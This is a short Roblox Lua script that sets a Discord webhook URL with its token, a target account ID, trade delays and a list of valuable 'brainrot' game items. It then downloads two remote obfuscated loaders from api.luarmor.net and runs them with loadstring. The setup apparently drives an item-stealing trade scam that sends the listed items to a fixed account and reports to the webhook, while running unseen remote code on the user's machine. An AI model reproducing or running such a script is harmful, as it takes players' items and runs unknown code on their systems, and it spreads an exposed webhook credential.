getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1478396250113048648/arEJTKTbu1Kx2uGZb0QUk8bzgqqJ9hiuO24Q76eOKM1iM0_NnyYz453TBZ9lEVPytXot"
getgenv().TARGET_ID = 5719035361
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Strawberry Elephant"] = true,
    ["Skibidi Toilet"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Ketupat Kepat"] = true,
    ["Tang Tang Keletang"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Dragon Cannelloni"] = true
}
task.wait(5)
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)

task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/bbc3ea0dde107fad93f71c4a20b96040.lua"))()
end)